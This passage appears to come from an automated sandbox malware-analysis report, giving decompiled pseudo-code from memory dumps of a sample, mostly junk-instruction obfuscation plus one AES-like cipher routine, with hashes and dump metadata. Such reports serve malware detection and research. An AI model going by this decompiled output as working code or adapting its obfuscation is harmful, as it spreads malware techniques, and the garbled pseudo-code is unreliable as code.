                            																	__edi = __edi ^ 0x4b7fb811;
                            																	asm("movsb");
                            																	if(__edi != 0) {
                            																		__edx = __edx |  *0xe3e00774;
                            																		asm("ror byte [0x8f93942c], 0x4d");
                            																		_pop(__edx);
                            																		__edi = __edi |  *0xd6e87e37;
                            																		__edx = __edx &  *0xea606417;
                            																		__edx = __edx - 1;
                            																		asm("sbb edx, [0x70721a87]");
                            																		asm("sbb al, 0x4");
                            																		if((__ebp & 0xdb833ed9) <= 0) {
                            																			__ecx =  *0x357dca7f * 0x3bd8;
                            																			__ebp = __ebp &  *0xffd3d099;
                            																			if(__ebp == 0) {
                            																				__esp = __esp -  *0xbeab5175;
                            																				__edi = 0xe15c9536;
                            																				asm("adc edi, [0x194d7c26]");
                            																				_pop( *0x3ddf6fea);
                            																				asm("rcl byte [0x949bb500], 0x22");
                            																				 *0x7e7f60e6 =  *0x7e7f60e6 << 0xda;
                            																				__edx = __edx + 1;
                            																				asm("sbb esp, [0x69d956c7]");
                            																				__ebp = __ebx;
                            																				 *0xd9150b30 =  *0xd9150b30 - __dh;
                            																				asm("cmpsw");
                            																				 *0xaf4180e =  *0xaf4180e >> 0xaf;
                            																				if( *0xaf4180e <= 0) {
                            																					__ebp = __ebp | 0x8f0a9777;
                            																					__bh =  *0xc92734b5;
                            																					if(0x12 < 0) {
                            																						__esp =  *0x10818779;
                            																						__cl = __cl - 0xe4;
                            																						__esp =  *0x10818779 |  *0xe9a43a8e;
                            																						 *0xb72423d7 =  *0xb72423d7 >> 0x2c;
                            																						__ah = __ah | 0x000000c9;
                            																						_pop(__ecx);
                            																						 *0x45c2490c =  *0x45c2490c + __al;
                            																						__edi = 0x61508012;
                            																						L1();
                            																						_pop( *0x8f7012e8);
                            																						__ebp = __ebp - 1;
                            																						asm("adc edx, [0x55b9b911]");
                            																						asm("rol dword [0xf61c6d9a], 0x97");
                            																						asm("sbb edx, [0x4f7029f1]");
                            																						asm("scasb");
                            																						__edx = __edx &  *0x1fdca1bc;
                            																						 *0xba86bc35 =  *0xba86bc35 << 0x54;
                            																						asm("sbb edx, [0xadd51567]");
                            																						 *0x1ab19732 =  *0x1ab19732 >> 0x17;
                            																						if( *0xba86bc35 < 0) {
                            																							__esi =  *0xb052397d * 0xcccd;
                            																							__ebx =  *0x9f823760 * 0x7f86;
                            																							asm("sbb ebx, [0xe61a115]");
                            																							__ecx = __ecx ^  *0x93244792;
                            																							 *0xe51f3062 =  *0xe51f3062 & __eax;
                            																							 *0x81c68e26 =  *0x81c68e26 |  *0xb052397d * 0x0000cccd;
                            																							 *0xb037b414 =  *0xb037b414 << 0x90;
                            																						}
                            																					}
                            																				}
                            																			}
                            																		}
                            																	}
                            																}
                            															}
                            														}
                            													}
                            												}
                            											}
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				asm("rol dword [0x24619c09], 0x46");
                            				L1();
                            				asm("adc ebp, [0xc54d0de8]");
                            				 *0x7ab7dbce =  *0x7ab7dbce >> 0x79;
                            				 *0x608c03c =  *0x608c03c + _t38 - 0x31c1a2c1;
                            				return _t33 + 1;
                            			}






                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 2
                            • API String ID: 0-450215437
                            • Opcode ID: 092dd346b6d46f6fbb9f7c1769c062ac94ebb93108abdbc3fc803e4b770b7def
                            • Instruction ID: fa16f216d9ef8b55b8554f1f13d7b6627fc64510aabbf846a9f2df3557afb6ea
                            • Opcode Fuzzy Hash: 092dd346b6d46f6fbb9f7c1769c062ac94ebb93108abdbc3fc803e4b770b7def
                            • Instruction Fuzzy Hash: 31B14072818385CFEB02CF34D88AB013FB1F39A3A8B49435EC5A29B5E1C3342519CB45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 49%
                            			E0039DA11(signed int __eax, void* __ebx, signed int __ecx, void* __edx, void* __edi, signed int __esi) {
                            				signed int _t31;
                            				signed int _t32;
                            				signed int _t34;
                            				signed int _t44;
                            				intOrPtr _t52;
                            				void* _t53;
                            
                            				asm("adc ebx, [0x89912dcc]");
                            				 *0x9915b325 =  *0x9915b325 >> 0xe4;
                            				asm("rol dword [0xb81be505], 0x5d");
                            				asm("adc [0x505991d], ebp");
                            				 *0x3b150599 =  *0x3b150599 & __esi;
                            				_push( *0xcd900399);
                            				 *0x220486a3 =  *0x220486a3 + __edi;
                            				asm("rcl byte [0x4869cca], 0xbe");
                            				asm("adc ch, [0xa4bdfb04]");
                            				_t44 = (__ecx ^  *0xa888f816) &  *0x27b204f9 | 0x00000086;
                            				 *0xdd17ea05 =  *0x86a6c48c;
                            				 *0x3e059930 =  *0x3e059930 | _t44;
                            				asm("rcl dword [0x9926ca03], 0xd4");
                            				 *0x62079928 =  *0x62079928 - _t44;
                            				asm("adc ebx, [0x124007f8]");
                            				asm("adc [0xa4fd45ee], eax");
                            				_push(__esi);
                            				 *0x115aee6f =  *0x115aee6f >> 0x52;
                            				 *0xe3910f1c =  *0xe3910f1c << 0x3f;
                            				 *0x24e76bec =  *0x24e76bec << 0x37;
                            				_t52 =  *0xcbff5208;
                            				 *0xd2f81a26 =  *0xd2f81a26 - _t52;
                            				 *0x57d0bd61 =  *0x57d0bd61 & 0x000000a0;
                            				_pop( *0x150924db);
                            				_t31 = ((__eax | 0x12be30ed) ^  *0xe82013a0) &  *0x108cc181;
                            				 *0xbe09e818 =  *0xbe09e818 - _t31;
                            				 *0xb230c7fb =  *0xb230c7fb | 0x000000a0;
                            				 *0xa0174e0a = (_t44 ^  *0x1705a20f ^ 0x2db1c209) &  *0xe82731a8;
                            				_t32 = _t31 &  *0x4d687a06;
                            				asm("ror byte [0xb818f32], 0xe6");
                            				 *0xa748bad9 =  *0xa748bad9 >> 0xe7;
                            				 *0x738570b5 =  *0x738570b5 >> 0x33;
                            				 *0x88f02c0 =  *0x88f02c0 + _t52;
                            				 *0x1aaf5ee =  *0x1aaf5ee | 0x000000a0;
                            				 *0xcef588bf =  *0xcef588bf << 0xdc;
                            				asm("sbb [0x847f6c20], dl");
                            				 *0xf75214d6 =  *0xf75214d6 + _t32;
                            				asm("adc bh, 0x34");
                            				_t34 = _t32 | 0xbb2222ea |  *0x22e9b4ed;
                            				 *0xeeb312ba =  *0xeeb312ba | _t34;
                            				asm("adc [0x5374eb9e], ebp");
                            				 *0x21c3a3f3 =  *0x21c3a3f3 | 0x000000a0;
                            				 *0x28013bde =  *0x28013bde -  *0xac38ae6a * 0x8f8;
                            				_pop(_t53);
                            				asm("adc esi, 0xc477c19a");
                            				asm("sbb edi, 0x448e5896");
                            				 *0x68f0fa0 =  *0x68f0fa0 >> 0x9f;
                            				if(( *0xbda5901 & __edi +  *0x824c9ce + 0x24d3fa16) < 0) {
                            					asm("adc edi, 0x32063d79");
                            					 *0xab0cd767 =  *0xab0cd767 << 0x87;
                            					 *0x9bec6bfa =  *0x9bec6bfa & __edi;
                            					asm("sbb esp, [0xb1074d1f]");
                            					__ebp = __ebp + 1;
                            					__ah = __ah ^  *0xe7c152f6;
                            					__ecx = __ecx +  *0x52d616f8;
                            					asm("rol byte [0x3f5bdfb0], 0x6e");
                            					asm("rcl dword [0x40d67d93], 0x72");
                            					 *0x8d05b3ba =  *0x8d05b3ba | 0x09946b68;
                            					__eax = __eax ^  *0xb8dbe1ba;
                            					asm("sbb bl, [0x521738f6]");
                            					asm("adc dl, 0x63");
                            					if(__edi ==  *0x3b7a3798) {
                            						__ecx = 0xd625bb75;
                            						asm("adc cl, [0x1cc6421c]");
                            						_pop( *0x83258e39);
                            						__ebp =  *0xb586d929;
                            						asm("lodsd");
                            						__bl = __bl - 0xe2;
                            						 *0x37ca8eb9 =  *0x37ca8eb9 >> 0x24;
                            						L1();
                            						__ebx = __ebx | 0x16dcb3e8;
                            						 *0x5fdf582 = __al;
                            						asm("adc esp, 0x59fa4eb9");
                            						asm("sbb cl, [0x70682422]");
                            						__edi = __edi - 0x4d6e0b81;
                            						__ebp = 0xf2574b93;
                            						 *0x5d6a02d6 =  *0x5d6a02d6 >> 0x4a;
                            						__edx = __edx -  *0xd3c4929d;
                            						asm("sbb edx, 0xfc77f79c");
                            						__esi = 0x34368fdd;
                            						asm("movsb");
                            						asm("rcr byte [0x490dded0], 0x77");
                            						asm("sbb [0x413ee312], al");
                            						 *0x194b31c6 =  *0x194b31c6 << 0;
                            						asm("rol dword [0x525601d8], 0xbc");
                            						__ebx = 0x6d1cd621;
                            						__esi = 0xffffffffdb8a1043;
                            						__ebp = 0x18f0f28b;
                            						__eax = 0xff68dc1b;
                            						asm("ror dword [0x71a7166d], 0xb8");
                            						_pop( *0x49969393);
                            						__ebp = 0xfffffffff2574b94;
                            						 *0x9aeba622 =  *0x9aeba622 - __dl;
                            						__ecx = 0xd625bb75 &  *0xbfc60e39;
                            						__ebx = 0x28096dd9;
                            						asm("sbb [0xf7fe1062], ecx");
                            						asm("rcl dword [0x49053da9], 0xc7");
                            						__edi = __edi - 1;
                            						asm("adc edx, [0x8ed410b8]");
                            						 *0x6335e18d =  *0x6335e18d + 0x9946b68;
                            						asm("rcl byte [0xd62282e3], 0xdd");
                            						asm("adc [0xece0b419], ecx");
                            						_push(0x8eebfdcc);
                            					}
                            				}
                            				asm("rol dword [0x24619c09], 0x46");
                            				L1();
                            				asm("adc ebp, [0xc54d0de8]");
                            				 *0x7ab7dbce =  *0x7ab7dbce >> 0x79;
                            				 *0x608c03c =  *0x608c03c + _t53 - 0x31c1a2c1;
                            				return _t34 + 1;
                            			}










                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: /Lz
                            • API String ID: 0-2861173035
                            • Opcode ID: aa92981e7ba435b8f194fb93b77a09b21e92044544689a33c5db77c0ee5d7307
                            • Instruction ID: 7d1aef7dfa562bceacaad7bd0813018dad076cb2eb645931283a92fa5a1d30c4
                            • Opcode Fuzzy Hash: aa92981e7ba435b8f194fb93b77a09b21e92044544689a33c5db77c0ee5d7307
                            • Instruction Fuzzy Hash: 7A815372A097C9CFC302CF38DC9A6023FB1F756360B49465ED8A287582E7382529DF85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 27%
                            			E00382FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
                            				signed int _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				void* _t273;
                            				signed int _t274;
                            				signed int _t282;
                            				signed int* _t358;
                            				signed int _t383;
                            				signed int* _t409;
                            				signed int _t411;
                            				signed int _t428;
                            				signed int _t457;
                            				signed int _t477;
                            				signed int _t559;
                            				signed int _t602;
                            
                            				_t273 = __eax;
                            				asm("ror edi, 0x8");
                            				asm("rol edx, 0x8");
                            				_t457 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
                            				asm("ror ebx, 0x8");
                            				asm("rol edx, 0x8");
                            				_v20 = _t457;
                            				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
                            				asm("ror ebx, 0x8");
                            				asm("rol edx, 0x8");
                            				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
                            				asm("ror esi, 0x8");
                            				asm("rol edx, 0x8");
                            				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
                            				asm("ror edx, 0x10");
                            				asm("ror esi, 0x8");
                            				asm("rol esi, 0x8");
                            				_v24 = _t282;
                            				_t428 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t457 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
                            				asm("ror esi, 0x10");
                            				asm("ror ebx, 0x8");
                            				asm("rol ebx, 0x8");
                            				_t602 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t457 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
                            				asm("ror ebx, 0x8");
                            				asm("ror edi, 0x10");
                            				asm("rol edi, 0x8");
                            				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t457 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
                            				asm("ror edi, 0x10");
                            				asm("ror ebx, 0x8");
                            				asm("rol ebx, 0x8");
                            				_t409 =  &(__ecx[8]);
                            				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                            				_t477 = (_a4 >> 1) - 1;
                            				_a4 = _t477;
                            				if(_t477 != 0) {
                            					do {
                            						asm("ror edi, 0x10");
                            						asm("ror ebx, 0x8");
                            						asm("rol ebx, 0x8");
                            						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t602 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t428 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
                            						asm("ror edi, 0x10");
                            						asm("ror ebx, 0x8");
                            						asm("rol ebx, 0x8");
                            						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t428 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t602 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
                            						asm("ror ebx, 0x8");
                            						asm("ror edi, 0x10");
                            						asm("rol edi, 0x8");
                            						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t428 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t602 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
                            						asm("ror edi, 0x10");
                            						asm("ror edx, 0x8");
                            						asm("rol edx, 0x8");
                            						_v24 = _t383;
                            						_t559 =  *(__eax + 4 + (_t602 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t428 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
                            						asm("ror edx, 0x10");
                            						asm("ror esi, 0x8");
                            						asm("rol esi, 0x8");
                            						_t428 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t559 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
                            						asm("ror esi, 0x10");
                            						asm("ror ebx, 0x8");
                            						asm("rol ebx, 0x8");
                            						_t602 =  *(__eax + 4 + (_t559 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
                            						_v12 = _t559;
                            						asm("ror edi, 0x8");
                            						asm("ror ebx, 0x10");
                            						asm("rol ebx, 0x8");
                            						_v16 =  *(__eax + 4 + (_t559 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
                            						asm("ror ebx, 0x10");
                            						asm("ror edi, 0x8");
                            						asm("rol edi, 0x8");
                            						_t409 =  &(_t409[8]);
                            						_t205 =  &_a4;
                            						 *_t205 = _a4 - 1;
                            						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                            					} while ( *_t205 != 0);
                            				}
                            				asm("ror ebx, 0x8");
                            				asm("rol edi, 0x8");
                            				 *_a8 = (( *(_t273 + 4 + (_t428 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t602 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t428 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t602 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
                            				asm("ror ebx, 0x8");
                            				asm("rol edi, 0x8");
                            				_a8[1] = (( *(_t273 + 4 + (_t602 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t428 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t602 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t428 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
                            				asm("ror ebx, 0x8");
                            				asm("rol edi, 0x8");
                            				_t358 = _a8;
                            				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t428 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t602 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t428 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t602 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
                            				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
                            				asm("ror ecx, 0x8");
                            				_t411 = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t428 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t602 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00;
                            				asm("rol edi, 0x8");
                            				 *_t358 =  *_t358 + _t411;
                            				asm("iretd");
                            				_t358[3] = _t411;
                            				return _t274;
                            			}




















                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                            • Instruction ID: 2d6a9b59a148e2f220b72e28617bc0a31228b76a2fc6da092e6daab3a681f851
                            • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                            • Instruction Fuzzy Hash: 94026E73E547164FE720DE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 48%
                            			E0039E5C0(signed char __eax, signed int __ecx, char __edx, signed int __esi) {
                            				char _v3;
                            				signed char _t20;
                            				void* _t21;
                            				void* _t22;
                            				void* _t28;
                            				char _t39;
                            				signed int _t42;
                            				signed char _t45;
                            				signed int _t46;
                            				char _t48;
                            				signed int _t60;
                            				signed int _t61;
                            				signed int _t63;
                            				signed int _t70;
                            
                            				_t60 = __esi;
                            				_t48 = __edx;
                            				_t42 = __ecx;
                            				_t20 = __eax;
                            				_t66 = _t70;
                            				goto L1;
                            				do {
                            					do {
                            						do {
                            							do {
                            								do {
                            									do {
                            										do {
                            											L1:
                            											_t1 = _t20;
                            											_t20 =  *0x939ff7b7;
                            											 *0x939ff7b7 = _t1;
                            											 *0x8f83e7b0 =  *0x8f83e7b0 ^ _t42;
                            										} while ( *0x8f83e7b0 == 0);
                            										asm("rcr dword [0xc419e217], 0x65");
                            									} while (_t60 != 0x84e5c4bb);
                            									_push(0xdd634e75);
                            									asm("sbb ch, 0x18");
                            									asm("sbb ah, 0x2");
                            									 *0xd173aeb0 =  *0xd173aeb0 - _t20;
                            								} while ( *0xd173aeb0 < 0);
                            								asm("sbb esi, [0xddbd1c2f]");
                            								_t2 = _t42 &  *0x9d1616ef;
                            								_t42 =  *0xc02c16ef;
                            								 *0xc02c16ef = _t2;
                            								asm("rcl byte [0xa8e0cc32], 0x7d");
                            								_t70 = _t70 &  *0xc6a616ef;
                            								_t66 =  &_v3;
                            								_t48 = _t48 - 0xa8 +  *0xa8e0cc32;
                            							} while (( *0xc83916ef & _t70) != 0);
                            							_t66 =  &_v3;
                            							 *0x8b7a16ef = 0x000000b2 ^  *0x997775;
                            							_t70 = _t70 - 0xc68ff209 | 0xe0cc32c1;
                            							_t48 = 0xa8;
                            						} while ( *0x8b7a16ef != 0xc83816ef);
                            						asm("adc eax, [0x52173a7b]");
                            						_t21 = _t20 + 1;
                            						_push(_t21);
                            						asm("adc esi, 0xef45d88d");
                            						 *0x81d04116 =  *0x81d04116 >> 0x89;
                            						 *0x4052173a =  *0x4052173a >> 0x7e;
                            						 *0x81c42916 =  *0x81c42916 & 0xef45d88d;
                            						_t61 = _t60 &  *0x50405217;
                            						asm("ror dword [0xef45d88d], 0x72");
                            						_t22 = _t21;
                            						asm("adc ebp, [0x8daddd0f]");
                            						 *0x16ef45d8 = _t61;
                            						asm("scasb");
                            						asm("adc edi, [0x453d99a1]");
                            						 *0x32ee16ef =  *0x32ee16ef ^ _t66;
                            						asm("adc ebx, [0x1db40ffd]");
                            						asm("sbb [0xe0cc3283], ebp");
                            						asm("adc cl, 0xa8");
                            						asm("adc ebx, 0x6d2b16ef");
                            						_t45 = _t42 + 0x311087db ^ 0x0000001c;
                            						 *0xff16efa8 =  *0xff16efa8 | 0xffffffff9cba1da2 |  *0xa8e0cc32;
                            						asm("ror dword [0xc62b7093], 0xd5");
                            						_t63 = _t61 &  *0xddbe17ff | 0xcc32c5f7;
                            						 *0x16efa8e0 =  *0x16efa8e0 | _t45;
                            						asm("rcr byte [0x4fa34f2], 0xc6");
                            						asm("adc bh, 0xb0");
                            						asm("rcl dword [0xcc32b9d9], 0x5b");
                            						 *0xc0d601ee =  *0xc0d601ee << 0x23;
                            						 *0x16d24939 =  *0x16d24939 ^ _t22 + 0x2f8a16ef;
                            						 *0x9076a2f7 =  *0x9076a2f7 << 0x93;
                            						asm("stosb");
                            						asm("ror dword [0x16d24939], 0x6d");
                            						 *0x140b36b6 =  *0x140b36b6 + 0xa8;
                            						asm("rcl dword [0xefa8e0cc], 0xac");
                            						 *0x8ce2a816 =  *0x8ce2a816 & _t63;
                            						 *0xaece9d8d = _t66;
                            						_t39 =  *0x5f828ee2 +  *0xa8e0cc32;
                            						asm("ror byte [0xaf869af2], 0xcb");
                            						 *0x5fc3ccf9 =  *0x5fc3ccf9 - _t45;
                            						 *0x16d24939 =  *0x16d24939 + 0xffffffffef45d8c7;
                            						asm("rol byte [0xab9c4208], 0xbf");
                            						asm("sbb ebx, [0x32baf2c1]");
                            						asm("sbb [0xefa8e0cc], ebx");
                            						asm("sbb ebp, [0x983e0416]");
                            						asm("cmpsw");
                            						_t46 = _t45 - 0xbed3f5bd;
                            						 *0x16d24939 =  *0x16d24939 << 0x54;
                            						 *0x71c621c =  *0x71c621c + 0xa8;
                            						asm("movsb");
                            						asm("rcl dword [0xcc32c1db], 0x2");
                            						 *0x16efa8e0 =  *0x16efa8e0 << 6;
                            						 *0x7c73a2fe = _t63;
                            						asm("adc edx, [0xc4a8009a]");
                            						asm("rcr byte [0xef45d8a8], 0x83");
                            						asm("sbb ebx, [0xa0f4be16]");
                            						 *0x33947a16 =  *0x33947a16 >> 0xca;
                            						asm("ror dword [0xc1dec32e], 0x5b");
                            						asm("rcr byte [0xa8e0cc32], 0x60");
                            						_t70 = (0xe0cc32bf |  *0x32ccebb8) +  *0x470c16ef;
                            						 *0xecc9b4a0 = _t46;
                            						asm("rol dword [0x395fc2cc], 0x51");
                            						 *0xc48616d2 = _t39;
                            						 *0x16efa8 =  *0x16efa8 << 0x53;
                            						asm("lodsb");
                            						_t42 = _t46;
                            						_t20 =  *0x241016d2;
                            						_t48 =  *0xe0cc32c1 + 0xfb45494;
                            						_push( *0xd88daddd);
                            						_t66 =  &_v3;
                            						_t60 =  *0x7c73a2fe |  *0xe04c16ef;
                            					} while (_t60 > 0);
                            					asm("rol dword [0xa8008977], 0x51");
                            					 *0x45d8a8c4 =  *0x45d8a8c4 - _t39;
                            					asm("sbb ecx, [0x9e3f16ef]");
                            					asm("rol dword [0xf9e2bc0], 0x2b");
                            					 *0x8f16ef88 = _t48;
                            					asm("adc edi, 0x16ef45d8");
                            					asm("sbb edx, [0x2bbc121f]");
                            					_t60 = _t60 +  *0xb2a10f9e;
                            					_push( *0xef8840ec);
                            					_t20 = (_t20 &  *0xa8c4a800) -  *0xccf0cc31;
                            					asm("sbb dh, 0xd2");
                            					 *0x33941616 =  *0x33941616 >> 0xd4;
                            					 *0xa8e0cc32 = 0x9fe24b16;
                            					asm("sbb [0xe26216ef], edx");
                            					asm("rcl dword [0x9a8081], 0x32");
                            					asm("adc [0xd8a8c4a8], cl");
                            					_t66 =  &_v3;
                            					 *0xd6b616ef =  *0xd6b616ef >> 0x7c;
                            				} while ( *0xd6b616ef < 0);
                            				_push( *0x52173a78);
                            				_t28 = _t20 + 1;
                            				_push(_t28);
                            				return _t28 -  *0xef45d88d | 0x00000016;
                            			}

















                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
